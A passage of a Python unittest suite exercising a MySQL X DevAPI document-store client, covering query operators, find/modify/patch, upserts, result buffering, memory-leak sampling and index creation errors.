                    "adatetime": "2000-01-01 12:00:01"}).execute()
    expressions = (
        # Single-unit intervals.
        "$.adatetime + interval 1000000 microsecond = "
        "'2000-01-01 12:00:02' as test",
        "$.adatetime + interval 1 second = '2000-01-01 12:00:02' as test",
        "$.adatetime + interval 2 minute = '2000-01-01 12:02:01' as test",
        "$.adatetime + interval 4 hour = '2000-01-01 16:00:01' as test",
        "$.adate + interval 10 day = '2000-01-11' as test",
        "$.adate + interval 2 week = '2000-01-15' as test",
        "$.adate - interval 2 month = '1999-11-01' as test",
        "$.adate + interval 2 quarter = '2000-07-01' as test",
        "$.adate - interval 1 year = '1999-01-01' as test",
        # Compound-unit intervals.
        "$.adatetime + interval '3.1000000' second_microsecond = "
        "'2000-01-01 12:00:05' as test",
        "$.adatetime + interval '1:1.1' minute_microsecond = "
        "'2000-01-01 12:01:02.100000' as test",
        "$.adatetime + interval '1:1' minute_second = "
        "'2000-01-01 12:01:02' as test",
        "$.adatetime + interval '1:1:1.1' hour_microsecond = "
        "'2000-01-01 13:01:02.100000' as test",
        "$.adatetime + interval '1:1:1' hour_second = "
        "'2000-01-01 13:01:02' as test",
        "$.adatetime + interval '1:1' hour_minute = "
        "'2000-01-01 13:01:01' as test",
        "$.adatetime + interval '2 3:4:5.600' day_microsecond = "
        "'2000-01-03 15:04:06.600000' as test",
        "$.adatetime + interval '2 3:4:5' day_second = "
        "'2000-01-03 15:04:06' as test",
        "$.adatetime + interval '2 3:4' day_minute = "
        "'2000-01-03 15:04:01' as test",
        "$.adatetime + interval '2 3' day_hour = "
        "'2000-01-03 15:00:01' as test",
        "$.adate + interval '2-3' year_month = '2002-04-01' as test",
    )
    for expression in expressions:
        result = collection.find().fields(expression).execute()
        self.assertTrue(result.fetch_all()[0]["test"])
    self.schema.drop_collection(collection_name)
def test_bitwise_operators(self):
    """Bitwise &, |, ^, <<, >> inside field projections."""
    collection_name = "{0}.test".format(self.schema_name)
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    ).execute()
    # (condition, projection, expected value of the aliased field)
    cases = [
        ("$.age = 21", "$.age & 1 as test", 1),     # AND: 21 & 1
        ("$.age == 21", "0 | 1 as test", 1),        # OR
        ("$.age = 21", "$.age ^ 1 as test", 20),    # XOR: 21 ^ 1
        ("$.age == 21", "1 << 2 as test", 4),       # left shift
        ("$.age == 21", "4 >> 2 as test", 1),       # right shift
    ]
    for condition, projection, expected in cases:
        res = collection.find(condition).fields(projection).execute()
        self.assertEqual(expected, res.fetch_all()[0]["test"])
    self.schema.drop_collection(collection_name)
def test_numeric_operators(self):
    """Comparison, logical, and arithmetic operators in expressions."""
    collection_name = "{0}.test".format(self.schema_name)
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    ).execute()

    def matches(condition):
        # Number of documents satisfying the condition.
        return len(collection.find(condition).execute().fetch_all())

    def computed(projection):
        # Value of the projection evaluated against Fred's document.
        res = collection.find("$.age == 21").fields(projection).execute()
        return res.fetch_all()[0]["test"]

    # Equality (both spellings) and logical connectives.
    self.assertEqual(1, matches("$.age = 21"))
    self.assertEqual(1, matches("$.age == 21"))
    self.assertEqual(1, matches("$.age == 21 && $.name == 'Fred'"))
    self.assertEqual(1, matches("$.age == 21 and $.name == 'Fred'"))
    self.assertEqual(2, matches("$.age == 21 or $.age == 42"))
    self.assertEqual(2, matches("$.age == 21 || $.age == 42"))
    # xor is evaluated per document; every "age xor 1" is false here.
    docs = collection.find().fields("$.age xor 1 as test") \
        .execute().fetch_all()
    self.assertTrue(all([doc["test"] is False for doc in docs]))
    # Inequalities.
    self.assertEqual(3, matches("$.age != 21"))
    self.assertEqual(3, matches("$.age <> 21"))
    self.assertEqual(2, matches("$.age > 28"))
    self.assertEqual(3, matches("$.age >= 28"))
    self.assertEqual(1, matches("$.age < 28"))
    self.assertEqual(2, matches("$.age <= 28"))
    # Arithmetic on Fred's age (21).
    self.assertEqual(31, computed("$.age + 10 as test"))
    self.assertEqual(11, computed("$.age - 10 as test"))
    self.assertEqual(210, computed("$.age * 10 as test"))
    self.assertEqual(3, computed("$.age / 7 as test"))
    self.assertEqual(3, computed("$.age div 7 as test"))
    self.assertEqual(0, computed("$.age % 7 as test"))
    self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
                 "id field creation on server side is required.")
def test_get_generated_ids(self):
    """Server-generated _id values are reported on the add result."""
    collection_name = "collection_test"
    test_collection = self.schema.create_collection(collection_name)
    # A single document without _id: the generated-id list must exist.
    single = test_collection.add({"name": "Fred", "age": 21}).execute()
    self.assertTrue(single.get_generated_ids() is not None)
    # Two documents without _id: one generated id per document.
    pair = test_collection.add(
        {"name": "Fred", "age": 21},
        {"name": "Barney", "age": 45}).execute()
    self.assertEqual(2, len(pair.get_generated_ids()))
    self.schema.drop_collection(collection_name)
def test_remove(self):
    """Collection.remove(): conditional delete and mandatory condition."""
    collection_name = "collection_test"
    test_collection = self.schema.create_collection(collection_name)
    test_collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 45},
        {"_id": "3", "name": "Wilma", "age": 42}
    ).execute()
    self.assertEqual(3, test_collection.count())
    removed = test_collection.remove("age == 21").execute()
    self.assertEqual(1, removed.get_affected_items_count())
    self.assertEqual(2, test_collection.count())
    # A condition is mandatory: None and "" fail at execute time,
    # while a blank string fails already when building the statement.
    for bad_condition in (None, ""):
        statement = test_collection.remove(bad_condition)
        self.assertRaises(mysqlx.ProgrammingError, statement.execute)
    self.assertRaises(mysqlx.ProgrammingError, test_collection.remove, " ")
    self.schema.drop_collection(collection_name)
def _assert_flat_line(self, samples, tolerance):
    """Assert the sample series does not grow beyond ``tolerance``.

    For every consecutive pair, ``samples[i] - tolerance`` must not
    exceed ``samples[i - 1]`` — i.e. the object count may grow by at
    most ``tolerance`` per step (a "flat line" within tolerance).

    BUGFIX: the failure message had three placeholders but four format
    arguments, so the tolerance value was never rendered (the message
    showed a literal empty "()"); also fixed the "previews" typo.
    """
    for index in range(1, len(samples)):
        self.assertLessEqual(
            samples[index] - tolerance, samples[index - 1],
            "For sample {} Objects {} overpass the tolerance ({}) from "
            "previous sample {}".format(index, samples[index], tolerance,
                                        samples[index - 1]))
def _collect_samples(self, sample_size, funct, param):
    """Invoke ``funct`` repeatedly, sampling the GC-tracked object count.

    ``param`` is a Python expression string re-evaluated on every call.
    CAUTION: the expression references the loop variable ``num``, so
    that local name is load-bearing and must not be renamed.  eval() on
    a caller-supplied string is acceptable only because this is test
    code with literal parameters.

    Returns a list of ``sample_size`` object counts, one per 10 calls.
    """
    samples = [0] * sample_size
    for num in range(sample_size * 10):
        _ = funct(eval(param)).execute()
        if num % 10 == 0:
            # Record the total number of objects the GC tracks.
            samples[int(num / 10)] = len(gc.get_objects())
    return samples
def test_memory_use_in_sequential_calls(self):
    """Tests the number of new open objects in sequential usage.

    Repeated add()/find() calls must not leak: the GC object count,
    sampled by _collect_samples, may grow by at most ``tolerance``
    objects between consecutive samples.
    """
    collection_name = "{0}.test".format(self.schema_name)
    collection = self.schema.create_collection(collection_name)
    sample_size = 100
    # NOTE: these expression strings are eval()'d inside
    # _collect_samples and rely on its local loop variable ``num``.
    param = '{"_id": "{}".format(num), "name": repr(num), "number": num}'
    add_samples = self._collect_samples(sample_size, collection.add,
                                        param)
    param = '\'$.name == "{}"\'.format(num)'
    find_samples = self._collect_samples(sample_size, collection.find,
                                         param)
    # The tolerance here is the number of new objects that can be created
    # on each sequential method invocation without exceeding memory usage.
    tolerance = 12
    self._assert_flat_line(add_samples, tolerance)
    self._assert_flat_line(find_samples, tolerance)
    self.schema.drop_collection(collection_name)
def test_bind(self):
    """Parameter binding on find(): invalid calls and all bind forms."""
    collection_name = "collection_test"
    test_collection = self.schema.create_collection(collection_name)
    test_collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    ).execute()
    # Binding nothing is not allowed.
    statement = test_collection.find("$.age == :age")
    self.assertRaises(mysqlx.ProgrammingError, statement.bind)
    # Neither is binding the wrong number of positional arguments.
    statement = test_collection.find("$.age == :age")
    self.assertRaises(mysqlx.ProgrammingError, statement.bind, 21, 28, 42)
    # Valid forms: a dict, a JSON string, and a name/value pair —
    # each resolves :age to exactly one matching document.
    bindings = [
        (({"age": 67},), "Betty"),
        (('{"age": 42}',), "Wilma"),
        (("age", 28), "Barney"),
    ]
    for bind_args, expected_name in bindings:
        docs = test_collection.find("$.age == :age") \
            .bind(*bind_args).execute().fetch_all()
        self.assertEqual(1, len(docs))
        self.assertEqual(expected_name, docs[0]["name"])
    self.schema.drop_collection(collection_name)
def test_find(self):
    """Collection.find(): conditions, sort, fields, limit/offset,
    aggregation aliases, and repeated execution of one statement."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    ).execute()
    result = collection.find("$.age == 67").execute()
    docs = result.fetch_all()
    self.assertEqual(1, len(docs))
    self.assertEqual("Betty", docs[0]["name"])
    result = \
        collection.find("$.age > 28").sort("age DESC, name ASC").execute()
    docs = result.fetch_all()
    self.assertEqual(2, len(docs))
    self.assertEqual(67, docs[0]["age"])
    # Projection limits each doc to the "age" field only.
    result = \
        collection.find().fields("age").sort("age DESC").limit(2).execute()
    docs = result.fetch_all()
    self.assertEqual(2, len(docs))
    self.assertEqual(42, docs[1]["age"])
    self.assertEqual(1, len(docs[1].keys()))
    # test flexible params (sort criteria given as a list)
    result = collection.find("$.age > 28")\
        .sort(["age DESC", "name ASC"]).execute()
    docs = result.fetch_all()
    self.assertEqual(2, len(docs))
    self.assertEqual(67, docs[0]["age"])
    # test flexible params (fields given as a list)
    result = collection.find().fields(["age"])\
        .sort("age DESC").limit(2).execute()
    docs = result.fetch_all()
    self.assertEqual(2, len(docs))
    self.assertEqual(42, docs[1]["age"])
    self.assertEqual(1, len(docs[1].keys()))
    # test like operator
    result = collection.find("$.name like 'B%'").execute()
    docs = result.fetch_all()
    self.assertEqual(2, len(docs))
    # test aggregation functions without alias: the expression text
    # itself becomes the result key
    result = collection.find().fields("sum($.age)").execute()
    docs = result.fetch_all()
    self.assertTrue("sum($.age)" in docs[0].keys())
    self.assertEqual(158, docs[0]["sum($.age)"])
    # test operators without alias
    result = collection.find().fields("$.age + 100").execute()
    docs = result.fetch_all()
    self.assertTrue("$.age + 100" in docs[0].keys())
    # tests comma separated fields
    result = collection.find("$.age = 21").fields("$.age, $.name").execute()
    docs = result.fetch_all()
    self.assertEqual("Fred", docs[0]["$.name"])
    # test limit and offset
    result = collection.find().fields("$.name").limit(2).offset(2).execute()
    docs = result.fetch_all()
    self.assertEqual(2, len(docs))
    self.assertEqual("Wilma", docs[0]["$.name"])
    self.assertEqual("Betty", docs[1]["$.name"])
    self.assertRaises(ValueError, collection.find().limit, -1)
    self.assertRaises(ValueError, collection.find().limit(1).offset, -1)
    # test unread result found: re-executing the same statement must
    # discard any previous unread result instead of failing
    find = collection.find()
    find.execute()
    find.execute()
    result = find.execute()
    docs = result.fetch_all()
    self.assertEqual(4, len(docs))
    self.schema.drop_collection(collection_name)
def test_modify(self):
    """Collection.modify(): set/change/unset and mandatory condition.

    Each step depends on the collection state left by the previous one.
    """
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    ).execute()
    # set() adds the "young" field to the three docs with age < 67.
    result = collection.modify("age < 67").set("young", True).execute()
    self.assertEqual(3, result.get_affected_items_count())
    doc = collection.find("name = 'Fred'").execute().fetch_all()[0]
    self.assertEqual(True, doc.young)
    # change() updates an existing field only.
    result = \
        collection.modify("age == 28").change("young", False).execute()
    self.assertEqual(1, result.get_affected_items_count())
    docs = collection.find("young = True").execute().fetch_all()
    self.assertEqual(2, len(docs))
    # unset() removes the field from the two remaining young docs.
    result = collection.modify("young == True").unset("young").execute()
    self.assertEqual(2, result.get_affected_items_count())
    docs = collection.find("young = True").execute().fetch_all()
    self.assertEqual(0, len(docs))
    # test flexible params; only Barney still has "young" at this point.
    result = collection.modify("TRUE").unset(["young"]).execute()
    self.assertEqual(1, result.get_affected_items_count())
    # Collection.modify() is not allowed without a condition
    result = collection.modify(None).unset(["young"])
    self.assertRaises(mysqlx.ProgrammingError, result.execute)
    result = collection.modify("").unset(["young"])
    self.assertRaises(mysqlx.ProgrammingError, result.execute)
    self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 4), "Unavailable")
def test_modify_patch(self):
    """Exercise Collection.modify().patch() (JSON merge-patch semantics).

    patch() merges a JSON document into every matching document: new
    attributes are added, existing values (including nested documents
    and arrays) are replaced, and attributes patched with a null value
    are removed.  The patch may be supplied as a str, a dict, or a
    mysqlx.expr() expression.  The assertions below are order-dependent:
    each step builds on the document state left by the previous one.
    """
    collection_name = "collection_GOT"
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": "Bran", "family_name": "Stark", "age": 18,
         "actors_bio": {"bd": "1999 April 9", "rn": "Isaac Hempstead"},
         "parents": ["Eddard Stark", "Catelyn Stark"]},
        {"_id": "2", "name": "Sansa", "family_name": "Stark", "age": 21,
         "actors_bio": {"bd": "1996 February 21",
                        "rn": "Sophie Turner"},
         "parents": ["Eddard Stark", "Catelyn Stark"]},
        {"_id": "3", "name": "Arya", "family_name": "Stark", "age": 20,
         "actors_bio": {"bd": "1997 April 15",
                        "rn": "Maisie Williams"},
         "parents": ["Eddard Stark", "Catelyn Stark"]},
        {"_id": "4", "name": "Jon", "family_name": "Snow", "age": 30,
         "actors_bio": {"bd": "1986 December 26",
                        "rn": "Kit Harington"}, },
        {"_id": "5", "name": "Daenerys", "family_name": "Targaryen",
         "age": 30, "actors_bio": {"bd": "1986 October 23",
                                   "rn": "Emilia Clarke"}, },
        {"_id": "6", "name": "Margaery", "family_name": "Tyrell",
         "age": 35, "actors_bio": {"bd": "1982 February 11",
                                   "rn": "Natalie Dormer"}, },
        {"_id": "7", "name": "Cersei", "family_name": "Lannister",
         "age": 44, "actors_bio": {"bd": "1973 October 3",
                                   "rn": "Lena Headey"},
         "parents": ["Tywin Lannister, Joanna Lannister"]},
        {"_id": "8", "name": "Tyrion", "family_name": "Lannister",
         "age": 48, "actors_bio": {"bd": "1969 June 11",
                                   "rn": "Peter Dinklage"},
         "parents": ["Tywin Lannister, Joanna Lannister"]},
    ).execute()
    # Test with an empty document: no document is changed.
    result = collection.modify("TRUE").patch('{}').execute()
    self.assertEqual(0, result.get_affected_items_count())
    # Test addition of new attribute
    result = collection.modify("age <= 21").patch(
        '{"status": "young"}').execute()
    self.assertEqual(3, result.get_affected_items_count())
    doc = collection.find("name = 'Bran'").execute().fetch_all()[0]
    self.assertEqual("young", doc.status)
    doc = collection.find("name = 'Sansa'").execute().fetch_all()[0]
    self.assertEqual("young", doc.status)
    doc = collection.find("name = 'Arya'").execute().fetch_all()[0]
    self.assertEqual("young", doc.status)
    result = collection.modify("age > 21").patch(
        '{"status": "older"}').execute()
    self.assertEqual(5, result.get_affected_items_count())
    doc = collection.find("name = 'Jon'").execute().fetch_all()[0]
    self.assertEqual("older", doc.status)
    doc = collection.find("name = 'Cersei'").execute().fetch_all()[0]
    self.assertEqual("older", doc.status)
    doc = collection.find("name = 'Tyrion'").execute().fetch_all()[0]
    self.assertEqual("older", doc.status)
    doc = collection.find("name = 'Daenerys'").execute().fetch_all()[0]
    self.assertEqual("older", doc.status)
    doc = collection.find("name = 'Margaery'").execute().fetch_all()[0]
    self.assertEqual("older", doc.status)
    # Test addition of new attribute with array value (patch as a dict)
    result = collection.modify('family_name == "Tyrell"').patch(
        {"parents": ["Mace Tyrell", "Alerie Tyrell"]}).execute()
    self.assertEqual(1, result.get_affected_items_count())
    doc = collection.find("name = 'Margaery'").execute().fetch_all()[0]
    self.assertEqual(
        ["Mace Tyrell", "Alerie Tyrell"],
        doc.parents)
    # "bastard":null means the attribute is removed (or never added).
    result = collection.modify('name == "Jon"').patch(
        '{"parents": ["Lyanna Stark and Rhaegar Targaryen"], '
        '"bastard":null}').execute()
    self.assertEqual(1, result.get_affected_items_count())
    doc = collection.find("name = 'Jon'").execute().fetch_all()[0]
    self.assertEqual(
        ["Lyanna Stark and Rhaegar Targaryen"],
        doc.parents)
    # Test update of attribute with array value
    result = collection.modify('name == "Jon"').patch(
        '{"parents": ["Lyanna Stark", "Rhaegar Targaryen"], '
        '"bastard":null}').execute()
    self.assertEqual(1, result.get_affected_items_count())
    doc = collection.find("name = 'Jon'").execute().fetch_all()[0]
    self.assertEqual(
        ["Lyanna Stark", "Rhaegar Targaryen"],
        doc.parents)
    # Test add and update of a nested attribute with doc value
    result = collection.modify('name == "Daenerys"').patch('''
        {"dragons":{"drogon": "black with red markings",
                    "Rhaegal": "green with bronze markings",
                    "Viserion": "creamy white, with gold markings"}}
        ''').execute()
    self.assertEqual(1, result.get_affected_items_count())
    doc = collection.find("name = 'Daenerys'").execute().fetch_all()[0]
    self.assertEqual(
        {"drogon": "black with red markings",
         "Rhaegal": "green with bronze markings",
         "Viserion": "creamy white, with gold markings"},
        doc.dragons)
    # Test removing an attribute by setting it to a null value.
    result = collection.modify("TRUE").patch('{"status": null}').execute()
    self.assertEqual(8, result.get_affected_items_count())
    # Test remove a nested attribute with doc value (None -> JSON null)
    result = collection.modify('name == "Daenerys"').patch(
        {"dragons": {"drogon": "black with red markings",
                     "Rhaegal": "green with bronze markings",
                     "Viserion": None}}
    ).execute()
    self.assertEqual(1, result.get_affected_items_count())
    doc = collection.find("name = 'Daenerys'").execute().fetch_all()[0]
    self.assertEqual(
        {"drogon": "black with red markings",
         "Rhaegal": "green with bronze markings"},
        doc.dragons)
    # Test add new attribute using expression
    result = collection.modify('name == "Daenerys"').patch(mysqlx.expr(
        'JSON_OBJECT("dragons", JSON_OBJECT("count", 3))'
    )).execute()
    self.assertEqual(1, result.get_affected_items_count())
    doc = collection.find("name = 'Daenerys'").execute().fetch_all()[0]
    self.assertEqual(
        {"drogon": "black with red markings",
         "Rhaegal": "green with bronze markings",
         "count": 3},
        doc.dragons)
    # Test update attribute value using expression
    result = collection.modify('name == "Daenerys"').patch(mysqlx.expr(
        'JSON_OBJECT("dragons",'
        ' JSON_OBJECT("count", $.dragons.count - 1))')).execute()
    self.assertEqual(1, result.get_affected_items_count())
    doc = collection.find("name = 'Daenerys'").execute().fetch_all()[0]
    self.assertEqual(
        {"drogon": "black with red markings",
         "Rhaegal": "green with bronze markings",
         "count": 2},
        doc.dragons)
    # Test update attribute value using expression without JSON functions
    result = collection.modify('TRUE').patch(mysqlx.expr(
        '{"actors_bio": {"current": {"day_of_birth": CAST(SUBSTRING_INDEX('
        ' $.actors_bio.bd, " ", - 1) AS DECIMAL)}}}')).execute()
    self.assertEqual(8, result.get_affected_items_count())
    # Test update attribute value using mysqlx.expr nested inside a dict
    result = collection.modify('TRUE').patch(
        {"actors_bio": {"current": {
            "birth_age": mysqlx.expr(
                'CAST(SUBSTRING_INDEX($.actors_bio.bd, " ", 1)'
                ' AS DECIMAL)')}}
         }).execute()
    self.assertEqual(8, result.get_affected_items_count())
    doc = collection.find(
        "actors_bio.rn = 'Maisie Williams'").execute().fetch_all()[0]
    self.assertEqual(
        {"bd": "1997 April 15",
         "current": {'day_of_birth': 15, 'birth_age': 1997},
         "rn": "Maisie Williams"},
        doc.actors_bio)
    # Test update attribute value using mysqlx.expr extended without '()'
    result = collection.modify('TRUE').patch(
        {"actors_bio": {"current": {
            "age": mysqlx.expr(
                'CAST(Year(CURDATE()) - '
                'SUBSTRING_INDEX($.actors_bio.bd, " ", 1) AS DECIMAL)')}}
         }).execute()
    self.assertEqual(8, result.get_affected_items_count())
    # Compute the same server-side value through plain SQL for comparison.
    res = self.session.sql("select Year(CURDATE()) - 1997").execute()
    age = res.fetch_all()[0]["Year(CURDATE()) - 1997"]
    doc = collection.find(
        "actors_bio.rn = 'Maisie Williams'").execute().fetch_all()[0]
    self.assertEqual(
        {"bd": "1997 April 15",
         "current": {'age': age, 'day_of_birth': 15, 'birth_age': 1997},
         "rn": "Maisie Williams"},
        doc.actors_bio)
    # Test use of the Year() function.
    result = collection.modify('TRUE').patch(mysqlx.expr(
        '{"actors_bio": {"current": {"last_update": Year(CURDATE())}}}'
    )).execute()
    self.assertEqual(8, result.get_affected_items_count())
    # Collection.modify() is not allowed without a condition
    result = collection.modify(None).patch('{"status":"alive"}')
    self.assertRaises(mysqlx.ProgrammingError, result.execute)
    result = collection.modify("").patch('{"status":"alive"}')
    self.assertRaises(mysqlx.ProgrammingError, result.execute)
    # Collection.modify().patch() is not allowed without a document
    result = collection.modify("TRUE").patch('')
    self.assertRaises(mysqlx.OperationalError, result.execute)
    result = collection.modify("TRUE").patch(None)
    self.assertRaises(mysqlx.OperationalError, result.execute)
    # Collection.modify().patch() must fail if the parameter is other
    # than DbDoc, dict or str (here: a set).
    self.assertRaises(mysqlx.ProgrammingError,
                      collection.modify("TRUE").patch, {"a_set"})
    self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 3),
                 "Root level updates not supported")
def test_replace_one(self):
    """replace_one() overwrites the document stored under a given _id."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    people = (
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    )
    collection.add(*people).execute()
    doc = collection.find("age = 21").execute().fetch_one()
    self.assertEqual("Fred", doc["name"])
    # Rename the fetched document and write it back under the same _id.
    doc['name'] = "George"
    collection.replace_one(doc["_id"], doc)
    doc = collection.find("age = 21").execute().fetch_one()
    self.assertEqual("George", doc["name"])
    self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 2), "Upsert not supported")
def test_add_or_replace_one(self):
    """add_or_replace_one() replaces an existing _id or inserts a new one."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    people = (
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    )
    collection.add(*people).execute()
    # Replace path: an existing _id receives the new document.
    doc = collection.find("age = 21").execute().fetch_one()
    self.assertEqual("Fred", doc["name"])
    doc['name'] = "George"
    collection.add_or_replace_one(doc["_id"], doc)
    doc = collection.find("age = 21").execute().fetch_one()
    self.assertEqual("George", doc["name"])
    # Add path: an unknown _id inserts, and the given _id wins over the
    # _id embedded in the document itself.
    missing = collection.find("_id = 'new_id'").execute().fetch_all()
    self.assertEqual(0, len(missing))
    upsert = {"_id": "11", 'name': 'Melissandre', "age": 99999}
    collection.add_or_replace_one("new_id", upsert)
    doc = collection.find("age = 99999").execute().fetch_one()
    self.assertEqual("Melissandre", doc["name"])
    self.assertEqual("new_id", doc["_id"])
    self.schema.drop_collection(collection_name)
def test_get_one(self):
    """get_one() fetches a single document by its _id."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    ).execute()
    # Look up Fred's _id with find(), then fetch him again by id.
    fred = collection.find("name = 'Fred'").execute().fetch_one()
    fetched = collection.get_one(fred["_id"])
    self.assertEqual("Fred", fetched["name"])
    self.schema.drop_collection(collection_name)
def test_remove_one(self):
    """remove_one() deletes the document with the given _id."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    ).execute()
    # Delete Fred by _id, then verify he is gone.
    fred = collection.find("name = 'Fred'").execute().fetch_one()
    collection.remove_one(fred["_id"])
    remaining = collection.find("name = 'Fred'").execute().fetch_all()
    self.assertEqual(0, len(remaining))
    self.schema.drop_collection(collection_name)
def test_results(self):
    """Unread results are transparently buffered when a new statement runs."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    ).execute()
    first = collection.find().execute()
    # Executing a second find before reading the first forces the
    # first result to be buffered client-side.
    second = collection.find("age > 28").sort("age DESC").execute()
    older = second.fetch_all()
    self.assertEqual(2, len(older))
    self.assertEqual("Betty", older[0]["name"])
    everyone = first.fetch_all()
    self.assertEqual(4, len(everyone))
    # fetch_one() drains a result row by row and then returns None.
    third = collection.find("age > 28").sort("age DESC").execute()
    self.assertEqual("Betty", third.fetch_one()["name"])
    self.assertEqual("Wilma", third.fetch_one()["name"])
    self.assertEqual(None, third.fetch_one())
    self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 4), "Dev API change")
def test_create_index(self):
    """Exercise Collection.create_index().

    Covers single-field, multi-field, SPATIAL (GEOJSON) and array
    indexes, then a battery of invalid index names and malformed index
    descriptors, each of which must raise.

    Fix: the "GEOJSON requires SPATIAL index type" scenario previously
    reused the descriptor of the preceding SPATIAL scenario verbatim,
    so the stated rule was never exercised; that descriptor now uses
    index type "INDEX".
    """
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    # Create index with single field
    index_name = "age_idx"
    result = collection.create_index(index_name,
                                     {"fields": [{"field": "$.age",
                                                  "type": "INT",
                                                  "required": True}],
                                      "unique": True})
    # Unique indexes are not supported
    self.assertRaises(mysqlx.NotSupportedError, result.execute)
    collection.create_index(index_name,
                            {"fields": [{"field": "$.age", "type": "INT",
                                         "required": True}],
                             "unique": False}).execute()
    result = self.session.sql(_SHOW_INDEXES_QUERY.format(
        self.schema_name, collection_name, index_name)).execute()
    rows = result.fetch_all()
    self.assertEqual(1, len(rows))
    # Create index with multiple fields (one SHOW INDEXES row per field)
    index_name = "streets_idx"
    collection.create_index(index_name,
                            {"fields": [{"field": "$.street",
                                         "type": "TEXT(15)",
                                         "required": True},
                                        {"field": "$.cross_street",
                                         "type": "TEXT(15)",
                                         "required": True}],
                             "unique": False}).execute()
    result = self.session.sql(_SHOW_INDEXES_QUERY.format(
        self.schema_name, collection_name, index_name)).execute()
    rows = result.fetch_all()
    self.assertEqual(2, len(rows))
    # Create index using a geojson datatype
    index_name = "geo_idx"
    collection.create_index(index_name,
                            {"fields": [{"field": '$.myGeoJsonField',
                                         "type": 'GEOJSON',
                                         "required": True,
                                         "options": 2,
                                         "srid": 4326}],
                             "unique": False,
                             "type": 'SPATIAL'}).execute()
    result = self.session.sql(_SHOW_INDEXES_QUERY.format(
        self.schema_name, collection_name, index_name)).execute()
    rows = result.fetch_all()
    self.assertEqual(1, len(rows))
    # Create an index on document fields which contain arrays
    index_name = "emails_idx"
    index_desc = {"fields": [{"field": "$.emails", "type": "CHAR(128)",
                              "array": True}]}
    collection.create_index(index_name, index_desc).execute()
    result = self.session.sql(_SHOW_INDEXES_QUERY.format(
        self.schema_name, collection_name, index_name)).execute()
    rows = result.fetch_all()
    self.assertEqual(1, len(rows))
    # Error conditions
    # Index name cannot be None
    index_name = None
    index_desc = {"fields": [{"field": "$.myField", "type": "TEXT(10)"}],
                  "unique": False, "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Index name cannot be an invalid identifier
    index_name = "!invalid"
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    index_name = "invalid()"
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    index_name = "01invalid"
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Index descriptor in wrong format:
    # required "fields" key is missing
    index_name = "myIndex"
    index_desc = {"fields1": [{"field": "$.myField", "type": "TEXT(10)"}],
                  "unique": False, "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    index_desc = {"field": [{"field": "$.myField", "type": "TEXT(10)"}],
                  "unique": False, "type": "INDEX"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Index type with invalid value
    index_desc = {"field": [{"field": "$.myField", "type": "TEXT(10)"}],
                  "unique": False, "type": "Invalid"}
    create_index = collection.create_index(index_name, index_desc)
    self.assertRaises(mysqlx.ProgrammingError, create_index.execute)
    # Index description contains additional fields
